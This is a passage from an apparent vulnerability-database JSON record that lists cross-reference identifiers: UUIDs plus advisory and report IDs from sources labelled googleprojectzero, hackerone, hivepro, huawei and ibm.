"97F1C960-A343-5B1E-B261-4834CF80B790", "988A0BAB-669A-57AE-B432-564B2E378252", "98CA9A39-577D-51F2-B8B9-B20E80D94173", "98CEA984-CF02-58F6-91D5-967F8D36F94A", "98F6C0C3-FC5E-5580-A148-55F2368B18C1", "99A0AA73-B93D-56EF-930D-4FD64A4F4D35", "99AE64E6-B01B-5B4F-A9AB-263630AA5414", "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "9A318669-DAF8-50FF-A5DF-E390E0386254", "9B0163DC-EE41-5E66-9AA8-A960262A2072", "9C3150AA-6C0C-5DC4-BEAD-C807FA5ACE12", "9C9BD402-511C-597D-9864-647131FE6647", "9CC224C9-907A-5219-8EFD-A94F15DE0ADD", "9D8C431A-57F3-560C-8146-1232C2C029C2", "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "9E16D977-AA24-57C3-9BD1-98296F3186F5", "9E4C737D-2D3C-5A43-B638-E131903225BC", "9E82678F-0559-56B2-94DC-6505FE64555C", "9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE", "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "A04C30E0-722D-5CF4-B80A-547C1C702024", "A19F503A-900B-5929-8182-4BD7B1043185", "A1E14906-26B2-5DF8-95E3-07736CC5DDF2", "A24AC1AC-55EF-51D8-B696-32F369DCAB96", "A32F9E91-783B-5C20-9630-6A4E3DDA9AFF", "A39E4181-7C85-5B10-B0F9-AD286D09BD2A", "A454A9CC-C18E-56A1-B166-1A0E244E0493", "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "A4F881D3-85FA-580E-9465-AA77CE5B7390", "A57FBD78-A654-5CEE-8291-163C8AFB7210", "A5B4FB6B-123B-544F-A4E4-46B0595C1C72", "A6308120-6A99-5D2D-A1F7-6384AC37959C", "A64B2D10-93F9-5DEB-8FF5-EDD62BD2F346", "A66D9AD7-B29D-5C48-B247-D8ACFCAE9BC7", "A7CA20BB-BCF9-52C0-A708-01F9ADECB1AC", "A9A21055-01FA-5B3E-84B3-E294A9641418", "AAC2853C-A655-5E80-9262-A654102B874A", "AAD37CB5-B2C3-5908-B0D3-052CF47F6D25", "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "AB5B35BD-2A55-5B27-A126-0CF1A7E7B145", "AB7F01A0-08AE-56CA-A116-D36B8B48FE8F", "AB801839-51E0-5EFE-B00D-ABBB6391399A", "AC9BE6BA-8352-57D6-80E3-8BB62A0D31C2", "ACB6C453-F1D5-5A65-91C2-DF455B997075", "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "AD904001-0962-5826-AD78-253E0FB3B7B7", "AE0FE928-3464-53AA-BBD2-B3F9E871CEDD", "AEF449B8-DC3E-544A-A748-5A1C6F7EBA59", "AF2B8EF5-A739-53BD-8B8D-04A8C441268C", "AF45C6B5-246A-5363-8436-954018BD121C", "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "AF93C0CA-BFDD-5C90-9D8D-55350790E1D1", "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "B03B4134-B4C9-5B2D-BA55-EEEA540389F4", "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "B09C4EFC-2C66-5CA8-910F-E21D17B89608", "B16D26DB-D60C-5C0C-9452-80112720B442", "B20A08C3-E06C-57C9-998A-C38174AEA7DC", "B22E3A22-BF14-5660-977A-2D28D2AA2500", "B26A6295-2D2D-508F-B94C-38B6944F8A1F", "B2FBA40E-C397-5DC8-8BF4-FA5BCB824172", "B32ED3B3-2054-5776-B952-907BE2CBEED6", "B3985759-BBD2-5956-860D-E6361564C262", "B3DDE0DD-F0B0-542D-8154-F61DCD2E49D9", "B4A4F7BE-BF43-5BB6-A4A7-A22C6B9DDCA5", "B596B144-65DB-5863-8244-67AEE883C50E", "B5E7199E-37EE-5CBA-A8B7-83061DD63E3D", "B6987F3B-86A1-5FDC-AD92-EAF6D264C14A", "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "B8D5B910-B397-520E-9526-FE32D86E93D8", "B8D9E2C0-202B-5806-88D2-B0E797582618", "B992B3E1-DF6B-5594-8A16-ED385E07A24C", "B9A69678-D96F-528D-B436-366259B4A283", "B9C2639D-9C07-5F11-B663-C144F457A9F7", "BA1F18A9-BE39-58BE-8639-9A0BF8F6AB20", "BA280EB1-2FF9-52DA-8BA4-A276A1158DD8", "BA454336-99D5-5669-9586-DE4761C4D7E2", "BA8F1657-CF64-574C-81BA-6432D5A351D4", "BB9DA286-F06B-5A55-B344-1196B32F3C2B", "BBE1926E-1EC7-5657-8766-3CA8418F815C", "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "BC98F6B9-CA75-554C-ACA1-30325FC62B0E", "BCD79315-7A3F-5041-9459-7CF1BEB5C6BC", "BCE44917-6A5A-5482-8773-B2FA0DE70F3B", "BD1B0180-DA8D-5255-B3FE-EB6CBC730206", "BD33CC4D-EC56-5A22-A712-1B23F8FB141D", "BD98107A-1F5C-5E0E-BB2B-51DFBAC1D4BA", "BDFBDA81-0DEB-5523-B538-F23C3B524986", "BE2B1B45-11AE-56F2-A5B4-2497BAE3B016", "BE4B2B71-B588-5666-9A02-7855DBD45762", "BE66A9B6-104B-5F49-918A-8B913CE46473", "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "BF2EF6C1-6CDB-598E-B8F0-B6803DE02CCE", "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "BFA4DC64-759A-5113-842C-923C98D12B44", "BFB49B3A-706B-5625-9899-54FCB1EE767B", "BFBBD550-B2CF-524B-87F6-D0A8980CDFD3", "BFE641BE-701F-5AE0-A891-975C96EFFAF6", "C0A0F6D6-A203-5F8D-819A-40B5B23B0223", "C0A9F032-9822-59DC-94CC-20C15DEE0FED", "C0AE83D0-09A6-58EA-A244-1E453E699C04", "C14C47DA-F04C-56CC-955A-FF12A410D2F5", "C1631982-501B-5433-8360-6D33D931706B", "C1878361-BBB3-5A2F-8212-945883518690", "C20BAC49-21F2-5BE4-B97B-2561BD95A1A8", "C306DCEF-59B3-5147-8169-3674490BD35F", "C3153E8C-0590-5D96-8EDC-AEE7E129246E", "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "C3C6029E-8A78-5C0B-9CF6-51489E455464", "C3DA2A71-DD68-5EF3-AC4C-5A10DECD333B", "C3E394AB-E22C-5A6A-B5AF-2A497DDAC7BA", "C45EBEA7-DE2F-5373-9AA5-334E20EA2D23", "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "C5531AD4-9DFE-5A81-97D2-D34FD02E2AD6", "C58D4A9D-FE17-5F41-8B1B-800E327BB411", "C5B49BD0-D347-5AEB-A774-EE7BB35688E9", "C60B1B73-A009-5CE1-9D6C-3B66270812FD", "C640B511-D1E9-5F57-964D-3826F1C68DF8", "C68080B0-3163-5E76-AD65-2B454DBB95EE", "C6AE3BFC-9BBB-5327-8845-C88ABB6FEE40", "C6C5DB3A-FC0D-58BE-B769-D097420B7716", "C72759ED-7C42-593C-A3C7-94E2CDB2B105", "C7617E51-4166-5517-879D-6385309E13D8", "C76F7089-967B-5A7F-B8DA-629452876A2A", "C772DCBB-20D0-51DD-A580-F96689E65773", "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "C7CE5D12-A4E5-5FF2-9F07-CD5E84B4C02F", "C7EE8D86-B287-50F5-B8C2-05E11E510900", "C7EFCE12-F44C-5E4A-8D51-D4F6CE4A377D", "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", "C841D92F-11E1-5077-AE70-CA2FEF0BC96E", "C87EF7D4-0E85-54CD-9D5A-381C451E5511", "C96865D9-B80D-5799-9EB6-DDF13650F0AA", "C98B31E5-B85D-50EE-9596-F00F1B89A800", "C9E3963C-74AF-51D2-ACF7-7687E92D049F", "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "CA408205-D32D-5A33-B1AF-0B863641C7FC", "CA625124-9F92-5FCF-83A7-3ECF5F0EBBFB", "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "CA8D6F85-3A73-5070-B9A0-3A47FAE2C784", "CB9B5FAA-47CA-5D85-91B9-0AC5179D527B", "CBCB527D-3C29-5E5B-8C71-D7F20AB001D0", "CBEB0168-C1C9-5A9B-8B92-83E1054E44EA", "CC4175EB-3B91-5ABB-A700-84FC1105AAD5", "CC614155-FD7D-599B-B89C-006B26D76F48", "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "CD2BFDFF-9EBC-5C8F-83EC-62381CD9BCD5", "CD8CABD7-BE65-5434-B682-F73ABA737C65", "CE477D7E-7586-5C82-8DCC-033C48461E66", "CF07CF32-0B8E-58E5-A410-8FA68D411ED0", "CF2E9209-48FF-5375-8638-93E7CC964EB3", "CF8077FD-4A28-511E-B1DA-F4F5476C36E6", "CF96C0AC-16EB-57DE-B450-775CC256F1C2", "CF9EC818-A904-586C-9C19-3B4F04770FBD", "D02E385B-76D7-5BDB-A49C-CE858BEB0009", "D089579B-4420-5AD5-999F-45063D972E66", "D0B02251-DCA3-58B6-B887-D339C4EAABF9", "D107A97F-1C44-59AB-8FFE-803D1DC21EA3", "D178DAA4-01D0-50D0-A741-1C3C76A7D023", "D1B13DF4-3B67-5E28-B67E-5CBE9B8C3D1A", "D1E393B9-589D-5A20-8799-0F762FD361DA", "D20389A4-F885-5B7E-B438-63820C721AD3", "D21805C7-F04C-57A9-8A40-84CEEB7695BC", "D21F1D28-2C44-5969-8F84-E5C6FF67DCFC", "D2602292-4969-564A-915E-2EFC6661FA35", "D298A3C8-E215-5549-B1A0-D01215070203", "D359E448-87C6-5DAB-AC08-9E7782F4EBD1", "D3C401E0-D013-59E2-8FFB-6BEF41DA3D1B", "D4220876-A611-59AE-8262-07797542DAB9", "D4B13E09-5713-5A3F-9BD4-6FF6836D56B6", "D5003B3C-B1D9-5840-816F-1AFEBCAC7FD3", "D536CD4F-33F2-570F-BA34-54E141F1132C", "D64C04EA-093F-5924-A39B-714908D4637E", "D6AC5402-E5BA-5A55-B218-5D280FA9EA0D", "D6EE5F29-18C9-5E59-B9E2-01DC93F5ACE9", "D72095BC-06C5-50B2-8F66-EC86811783D3", "D77DEF60-6E7D-5708-B9F2-DB4EA3E38C23", "D77EE79D-71A5-51BA-9A16-DC757F86CC50", "D7AB3F4A-8E41-5E5B-B987-99AFB571FE9C", "D7D65B87-E44D-559F-B05B-6AED7C8659D5", "D7D704DD-277E-5739-BD5E-3782370FCCB3", "D813949A-183D-55ED-AF64-B130B8F95A56", "D8246B9C-AC86-5FFA-AA8F-4419E4CD07F1", "D93AD4F3-228E-5F05-A21F-9D852E25F569", "D959F04C-CDEC-5F39-9F51-BE3EC7B28341", "D9F6E4B0-AC2C-5A70-B795-360757BE02D2", "DA01F84A-9B1D-5337-A465-2A9AB088C056", "DAB5D6B4-8A2D-58C0-835F-DA4F27B2142D", "DB81B174-C3E8-5B08-80E4-A6D768400C4A", "DBBD6963-3870-5117-A829-3DE976AE90E2", "DC044D23-6D59-5326-AB78-94633F024A74", "DC2A0BD8-2ABF-5885-957D-0FA3B058665C", "DC83CAA2-80A2-5618-A8BB-64F21B1308CA", "DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0", "DDDD3D70-3C6C-5957-B39C-BC7FF579239A", "DE88B6AE-5D54-5B49-A097-57038C720463", "DEC5B8BB-1933-54FF-890E-9C2720E9966E", "DECBAC7B-9235-5E00-81C1-142CD41306FB", "DEE433F2-3A1C-513B-AE6B-E11EFFB5A8E4", "DF28DCE7-CCFF-5653-81BA-719525BE09AD", "DFB437A9-A514-588D-8B48-A6C7C75EAD32", "DFF2F784-9ED2-50EF-B79E-3EBF5A9B5428", "E0452D6A-51BC-51F5-9C1C-6CF01DA2805E", "E06577DB-A581-55E1-968E-81430C294A84", "E089A8D5-F5B9-5354-8F98-7A6A5AD25E95", "E0A2EF02-5087-5522-ABA0-52F4142BB87B", "E1457E6C-87A3-5557-A3F2-175005D2A765", "E1ABFD41-98C8-576F-8509-5541B40FD442", "E235B3DF-990F-5508-9496-90462B45125D", "E278D22E-7EC5-5A63-ADFC-EDEFDC650AA1", "E2A4C4A7-DB29-591E-810E-A216F49A9CDF", "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "E4103A50-881C-52BB-86CC-27F549B798E9", "E4491698-477C-599A-A65D-EBA7441764E9", "E458F533-4B97-51A1-897B-1AF58218F2BF", "E4E73A91-5275-59C0-AB2A-7F3EE83DDE28", "E5280802-AB3D-5E96-83E0-97F22FB9EACA", "E59C9A70-6F3E-5CF6-9F15-B0039E0FBAF1", "E601A788-C87D-5DD7-98BA-A68C2FEDE978", "E655806B-A2A8-5BCB-A30A-0120CA3E97A6", "E6E03693-50B8-5AB4-B766-8464A228BA02", "E7D3FB75-54DE-5CD8-83D6-438BFC7CFA74", "E82ECEEF-07B8-5340-BAC6-FA5B0E964772", "E90678A1-4183-5E58-A4E2-5E48E8767D92", "E981B35D-7356-5A5A-963A-744545A4E51C", "E99EC1B8-78FB-51D7-A94A-F8B504DFBEF5", "E9B21C59-ED98-5B3B-A993-F1C214F8796C", "E9DFB8EA-B99D-5022-ACE6-5A42D0D6A350", "E9F25671-2BEF-5E8B-A60A-55C6DD9DE820", "EA1AF0D9-1E6E-5080-BB7C-9D6035795FFB", "EA3173CE-C426-5047-864A-480B1A30F235", "EA3C5D7E-0CC8-5AEC-8D7F-3C245A834DDA", "EA906824-9149-507D-893C-87A7FED8998B", "EA908F34-E282-522D-A0C0-E6D40C0621CD", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EB648301-A198-5E4A-A72E-9639ED09F6C9", "EC0987E2-0001-5D63-A5AF-09675A5915BD", "EC35769F-2EAD-5464-8F97-D90F768E1E2D", "ED1C6DF0-94A0-58D6-B6F0-1034CE61DFCF", "EDDA4558-9527-5BDE-86E3-23DDD0BA5443", "EE01D764-5F14-5C0A-BD77-8E32854C5216", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "EF37F62F-1579-535A-9C3E-49B080F41CAC", "EFD098FC-90C8-5665-98B7-79C96C6AEBAE", "F00E8BE4-12D2-5F5B-A9AA-D627780259FB", "F085F702-F1C3-5ACB-99BE-086DA182D98B", "F1347375-6380-5145-9881-486B76875649", "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E", "F1B229EB-2178-53B9-839E-BA0B916376A2", "F1C20A6A-5492-50FE-BB94-25D35B1459EC", "F1CA855B-967C-5A5E-9256-FDDE87702713", "F1D342BE-E1E0-5B33-A19B-E2EB9E3E7C80", "F1E9BE6D-4024-56FB-80BB-B10ED5889144", "F208D311-79CA-5A2C-AE81-591BA4D30750", "F27B127B-57F0-5352-B92F-B6F921378CBB", "F2F2719B-7041-5D1A-A95A-7617360B1D08", "F32DF396-0485-5F43-8A52-31B8DD252790", "F388C84A-40DA-58BC-BE0A-74C7E1712C54", "F3A40027-6DB5-509C-81CF-473DE3BEF46E", "F3D43FE5-47AE-591C-A2DD-8F92BC12D9A8", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD", "F472C105-E3B1-524A-BBF5-1C436185F6EE", "F493C59E-F2A7-52D1-B4B5-69CD3748C5E9", "F4C136DE-892B-5921-8475-E30BD548DDBB", "F4C155BB-D279-51C9-A988-FF65F4CE76EF", "F50E9F2C-8C80-5A76-A993-A3E42414D797", "F523E799-3659-532F-8EED-40AD7F79E752", "F5339382-9321-5B96-934D-B803353CC9E3", "F594470D-2599-5B2E-B317-C9720581C07D", "F5B504D7-7C37-5BAB-94A5-1F1DA8384055", "F5CEF191-B04C-5FC5-82D1-3B728EC648A9", "F6A3D0A7-D380-5633-BFA5-3633EEBB6CDF", "F796D11D-F85B-5218-BBFA-9BDBAE5B6A59", "F7994B92-2846-5644-8B68-EFB6DFB95ED2", "F8906E65-8ADB-59DB-8A3A-AEEB8FD45719", "F92F972D-7309-5D0B-BCC2-054883AE83E9", "F99D82FC-3BE5-5B6D-8FDC-0E5BF9C0CE58", "FA2E2C3F-6F4C-5B17-ABFC-FC95FA17C474", "FB593988-2CFC-5828-8229-9274AC7B0F86", "FB60910B-FDAB-562A-8DF6-4E5DDE9F87B9", "FB65C479-F4E7-58BA-BC4A-AED04F10A11C", "FB7F5C33-B7F8-5801-82DC-974106DCDC17", "FB83113C-AABD-5893-8DDE-332B57F4FDD4", "FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "FBC9D472-5E25-508D-AB6E-B3197FCFED2D", "FC661572-B96B-5B2C-B12F-E8D279E189BF", "FC802471-7CE1-5444-80E9-9DB49BA530DD", "FD364396-D660-5D23-8323-23248A5108C5", "FD65F47A-0B60-5F08-BFC2-1ABD16F49781", "FE8572DF-42D4-521C-B3DC-4715C2F9240D", "FEFA5AE8-5C94-5174-B44C-AC52B9AEAEAD", "FF761088-559C-5E71-A5CD-196D4E4571B8", "FF81AF93-C247-5242-810E-AA1201C16776", "FFBC2747-5957-57B1-9DD9-AB2BAFCB7BD6"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hackerone", "idList": ["H1:1119224", "H1:1119228", "H1:1174185", "H1:1248040", "H1:1249456", "H1:1423496", "H1:1425474", "H1:1427589", "H1:1429014", "H1:1438393", "H1:1624137", "H1:591295", "H1:617543", "H1:671749", "H1:671857", "H1:678496", "H1:680480", "H1:695005", "H1:838196", "H1:913695"]}, {"type": "hivepro", "idList": ["HIVEPRO:09525E3475AC1C5F429611A90182E82F", "HIVEPRO:0B8823CF2C319136EC74B1EBBD7D38BE", "HIVEPRO:0D02D133141B167E9F03F4AC4CA5579A", "HIVEPRO:0E3B824DCD3B82D06D8078A118E98B54", "HIVEPRO:10B372979ED5F121D7A84FB66487023E", "HIVEPRO:1825C4046C6054693C41D7D5DFD7BA10", "HIVEPRO:186D6EE394314F861D57F4243E31E975", "HIVEPRO:205916945365E4C9EB9829951A82295A", "HIVEPRO:28A01D4CBC8A05BECFBA17B5AF4793F1", "HIVEPRO:310F7AA9457FF55D42E100B468844E6D", "HIVEPRO:3D8952D1ED1ADBF8196A73CD3B7344F2", "HIVEPRO:5339CBE01BD312A79B81CAAEE0F3B32E", "HIVEPRO:57EAE0D1FD9EA88C12142AFF641985C3", "HIVEPRO:6B816A83F1272E907442906CCA28A809", "HIVEPRO:753BDE83C1D82672DBEDB937144E1598", "HIVEPRO:8B19BED13F2445F04B8CD896B9AE4959", "HIVEPRO:8D09682ECAC92A6EA4B81D42F45F0233", "HIVEPRO:8DA601C83DB9C139357327C06B06CB36", "HIVEPRO:911A69A767BEAA3AE3152870FD54DF6F", "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "HIVEPRO:A2447429328461A02AB00335C0BB3EC2", "HIVEPRO:A72667DE3469446CCB2C0BE35790E287", "HIVEPRO:A9AF072A11E6D314ED458ACFFE3BDFD3", "HIVEPRO:B25417250BE7F8A7BBB1186F85A865F9", "HIVEPRO:B3F9F66CBDECF3B8E7AADF5951D97F6A", "HIVEPRO:B772F2F7B4C9AE8452D1197E2E240204", "HIVEPRO:C037186E3B2166871D34825A7A6719EE", "HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74", "HIVEPRO:D5E3F04B4C2C9644D7C5DCE9894CF0C6", "HIVEPRO:DB06BB609FE1B4E7C95CDC5CB2A38B28", "HIVEPRO:E57DA2FED4B890B898EFA2B68C657043", "HIVEPRO:E73184FF060DA7208BAF888A5AF221EF", "HIVEPRO:E7E537280075DE5C0B002F1AF44BE1C5", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "HIVEPRO:E9C63D0D70D3232F21940B33FC205340", "HIVEPRO:F2305684A25C735549865536AA4254BF", "HIVEPRO:FD730BCAD086DD8C995242D13B38EBC8"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20201105-01-NETLOGON", "HUAWEI-SA-20210310-01-ESCALATION", "HUAWEI-SA-20211215-01-LOG4J"]}, {"type": "ibm", "idList": ["004795EC88EC224A6BFB93940B96344B4EB9FAFDD91D056225AB0FB24FFE6CFE", "00B8C97EE29C4817481434B7FD887049A0EA42C49E5514E1877ED97B5322DB16", "00CA973D0D5F4A08ADB77D27F66CF53D661D1B67B8DA263B3CE4522918A4CFFF", "0172701FE5FE7C060372C9A6E7199B0E91A4F7E5904E7762F54202A8D4CB9759", "01C1A66F149F6CC650556CCBE7E381780D3142691366A6B6EFBC8CD5C674BD4D", "023C54E1D297D5AA9E7F44F8089DE35CB079281FA1776467BF8B7A7AD4FE252E", "03991456EAB03B09B39DC9DB5C8BE4A51167523943AA9AE61168FCD6FBACC80B", "03FB798F067FAF41EB009C69979886C89AC88567ECBC9DAD159CDC2AB547C1F7", "048C762AAACAFC74604EFAB15A41479F902FA040758DF428CB364B0242E01EE5", "04D3658F043D6F4A2AA1B2F519A7E89C112641C7C4E2E58E14BEC11BA66E803D", "053134070CB8D6609B7F157DC74146FFBCB3EBE941406A677E889C3CAF773364", "05A1D58708802BF8C1674EE32BEC4344254929330218CAD68AA838AA7F549BF7", "05BBDE1FB03AC43275CE3464D408E5E21E63D250E7B0CF0E90D314FBD5991752", "05C0F0FFAAC20F511D50030C8EC7ECBE67EB162A7352C90C63F986E1F73F829F", "05C433115EE2DEF62DD69CA7C7E97FF424FB6D815F82B8FFDD0435DD323AC60F", "05DC2B42328B1D8271D4FF358EC4A58529E6A6A6B8D7E154A691EFE1CCE81D1A", "06B617CF301DC9505BA9DD5DB1C356FC3A1CCF92C2BD6C1F311F6B9EB8C0F85A", "07F48EB2EFD881D21294E1AFEEE704414B9605E4B9B1F4BF6C82B1917372C2B8", "084618FE115DBC963CDA469EFDF156D77B5FAF5BE04B99575716D75AE5C42F9B", "08493CBA8B1A8F34C7786760C52C7997B8AE1C300A4CD3A03EEF9B528175E0E6", "086B39C8EEA9E80F827A72EB837BB35072FC75FA2EFB8DDEC667E6F0D07BFC82", "08803B708D4CA95FF8DD68A4DE7FBE7DEAA67387194E25D8CD693B135E7332D9", "08FF14BF18D2D8DEA2BCD9900A4BED9C481C9700F7CF99B6CD1B3F7EDA9C3865", "092A442A77CDFE46ED83F2F7A7AEC07007442443AE7B6D28BB557D1A8FE3BBB2", "09E2EB771A00246F88812FA7239EC135B4D760017A61975C9C7DFACAB2B566B3", "0A425AE154320282FF38ABB3C8BA8D3AD10793B88A3CFCA031B295F986453B12", "0A50FDB1D7E17C09815A2D06C237539FFD67E23789BDD9A730E5EB3DD9473349", "0A6CCE42A31E930F28AFDE0602BBBC571E0114C6DE44000B246AC3D8A844DE39", "0AC735C19116A7FB66D9921F93B7D9FF1E6BB4F1F2A9AF8B4AA371BC3E7211BE", "0AE80E7D1B92F5584C0652988A6BC58F1CE1E37349CB543C23A7BCE8C2445CCD", "0B0C1C8C8CE115B4178E3F36D545ECA410D6199928FD71C89DC4DE93BB9DDD9F", "0B7D327E5943F8BAC5B2E5CC855F0062D08A51BF03FA3BB29C4B6E081796EE73", "0C1804CEEC31BC3891CD11D25C3FF5366F208C6C862263628223F5F36164CF5F", "0C5DF0032AED817AD90450244E2BACA3580BEA79A5DBA7B84BC329B4F1B22585", "0CF13F8FB4FD77C6593C265FA8F397D0C4324FC1F07F86C436B4937E98B25DBF", "0D6234D366BD8E5B02C4B7507046A503B63D0B4B38E06DEEBC5B6B98A5E2C80E", "0E0248E4E7C78DC0F137D1A675D47FF40D0F4EEB2A876D0083EA60DD92CFF303", "0FEC88A4274D91DBFBCE46AE5EAF1CC67B908E3D943BD3504E2985D9090BF93C", "0FEF4738C59C97322DBD25A9806D1EE3E131F117AF9CA9C33F3A6098A981AE66", "10DF4536D86919652FFFFF08E8AC284AF696E6684CAF921DD9F5AB335A3882A9", "10DF54AA6E02F56E5A696B90CA92AA8E0E7F033CECD731E6AF976A827BD42316", "11FEAADF6A94DFB6615A82EE0023D346C418ECD114C445A6BA52D50AA2C6FE0B", "127C76472291CDD3CB521ED83F3C5EE611A0DBD9FFDB39D76C830FEB168F09A4", "129CE78870CF5A56320BA28A8E839DC00636BEBEF434ACBBC173D76B086059A6", "12B5FC796651D7A35DCF3B8B99675B867D7E526A689762A16A5B6315936577BB", "1310B3EFA1CB8221444DBC5BA49E64CF94DE9CAEC7263EBE35877FDC59E5AC3F", "1344237EA4CB2FC0E4E886077C19B07F9DB7272438002709C5CF339D588A226A", "13F541CB7E471297DBC119C027DC6613DDB93B7E6EC8CAAB1918D4F75B9B0A25", "1449AEBCE14C7A0A52FEC9AC77DB499F51B4D1779EECBB859DE1E3343B21DE81", "1564B346628009160A0396828F83A178C5F24808FA0E2904A4DA0F9DD72C42DE", "15A287A106B845D07333D01887C3D8023917F0A2AED2934387D8904CA8A42DA3", "1629CA1DFD389EEFF25556E8C9B707086E571E474449820E949D944C6EB994C3", "1718BBC548F6B9290910114BC5C00A77714052D125CB0F46088F37430F68E717", "1827A1B8985F4A2B91EE262D4C17EF01B71CFEA86DB0A386BD1C1B098E2F4B69", "18433120583E82C639DDC6BF1D76EF365C9C500B0A9CC0AE663BA4BE32DC9232", "18578ECA481CB003C14A84CA7A47ACA060F579C24F4075A776AF26B575502960", "185EAAB4DDC8472DF44603A1F8F5361C61E9CD92D640BE3D1EC6D31AE959C4F0", "18A5E6C2581806177DE446AE26FCBC2EBB616C29B40041253F318FF51CE1AFB5", "19613990614CDAB7F34154F3A620BBF18E7F15F79F3D35FBEB7EC2FC9249AD2C", "198E2723EA7A1CE1B7B95165E39923D5EC8AC5F2D17849CEEDD3695D8CF40623", "19BDC8BC083D06551FAAFFE502D5430968A9B28E5C71827BCFA873F30BA60815", "19DD6BC826C8BB8D144E5985E9EA9E8E00533CC7AEA127F00BAC78AFBE98ED00", "1B24B80EE0365FFF7DD17D658867C0FAF5A2D298D0CEFC01C750A9D3A2948965", "1C6CC8129E7AEC5C314CCFD7570FC09548438820946E9774FD2E2410C0897958", "1CF787D3495FD84D3FB0E74685765A4270075CE576D888A960036582B4F83133", "1CFF840C0308591ED858D48151909C9A66A9C154B22BCC3BCF7A195C153D3C69", "1D2ACD2E26FAAB07F4713510046DB56AE9A2584306D1B3C884E18DC47771F892", "1F4AD6C45C3008DFF01BE9EE1718E1541E761D5A4D77198ECEBE3A97CBCEF6FA", "1F6B1F3D85A0CCA59E5FCB54F755C559078C8064F36F920EB06BEDB03C8098C1", "1F7D1DABE3F10F804A14788D638556B04F5D5038E1088B9F38B3961987623815", "2042D81324560EA3A6747DAF5E2633EFD4EC3C4BB62989E7EF2C6A1F73035677", "207BA1F7EAE0F24909102A8E9F71F4E090F16E370A882E1CE68B1B6EFB5952F4", "209DDCAB6F475A868DA84DD19D31132027FF62B259B6541CA0C9859AD7CF6ED3", "231A52BDE442B2AB4C8738E8A5DA147B21BA8A7C7B8F0AE7764349AD467647ED", "23532FC7488A1E0A5525D86FA8B58841ED6086B69C02A7FBB104B3F98E2ED3CE", "23AE54815D4CF73296F6842E5DC0E74807A9DBD435A1F78F1FCEB4A6582B9613", "25649DBC7E3256428D82B855B8B2D096C91EC2361653C508EA395A775FB57C82", "256D7977365CD514F903FC0D0240FD89D47444B078D35EB3DA4DD54AAC8C8661", "261D21204C9E2060DE70CAB5932236C5EFB2EE37E8BD5A2C64CC6F1DFE9C5D11", "2709A19D29B9047D230E570EBF5F26A53D322D557D88CBCFB480F1AFEEF6797C", "28932A2B46E12EA86EB64762E53A114C7EAE97254E4818FFBB7E3706DCBD4C0F", "29D0DF01470BDC8419B05A248E7472C3D66A25942620A36BE340FC58780F85D4", "2C91E3B2FEF04BCEF23F12290F03A43D58EEE4E79946072B4CD9E132F31D3891", "2E43FFB94818B9FA5C94DA88B4D321908359974CB3975DC266C2CC995ACB39F3", "2F83AABA00B663AFEF63A77633BECC48724170228D80CF284B2FA6A8E71FE2F8", "3013E3EDD3900D973C5458C7115888BA961C479A9EB9DA6399CA9B389B37A68A", "30495EE9B3C48AB51AC589D2A5956D977474A3BCCB9A67B54801DEE7685C5573", "30B9050919D7C39431AC5338C16936C21A40D07623E5A2722246A5F91B5C6781", "30E9FB4250193CA2C5AB02F5095C96F34F2044E06280324E18E38EEFD7C1490E", "31818542FEE3EBA05F196E3245AADB3A27506A9391A7E39DC666A3A5AAEE4963", "3220BFD68D0CE5B97E4EC49AFAD94FC9317DA5DFDBD73C624B022C3E93AC4268", "342C70DE6943237DCB4E2BCA66A117A8AC4A929DA3631A2BB88E27D99C1A1F68", "34A1BC83BF19906C7B478BA74801364559DCACB160B8635E7EB96D184FEF89D3", "37EB0FBFC18EAA8CBA405BA4A0486007287891F661D591E70F8DFD893065763F", "382442D01890BE0F397DB0132A6B09339C6A137724C837A5E2907ACB61EA374D", "3828A20846DAD245008B2B65E98D8C5488EDD3BEE6195D59400F18E61B82C570", "3976D01F8C3788737A665B8B2C67DBBC91A5E249602308AB620D7FB7082293F3", "39C439A440712A8825FAF249AE9256D154F422331B554EA4FEF0A1953F90EEE0", "3DD98F75D577A590F9C6B1044AA5212C3724660A7C7FB06B6DA4B25B95BAE35A", "3E89F6F868ACED4017A55BB54A40658D10E6704003F50ACBCE289C1637B41045", "3F108F67BF1C0CDF3357048A55D6F542375A28F355F9359FDBF6A3EA00B3BE23", "3F22D484EEB21B0ECFBCEC72BC808CC13691870E90AFA5724963DAB7B31EAE45", 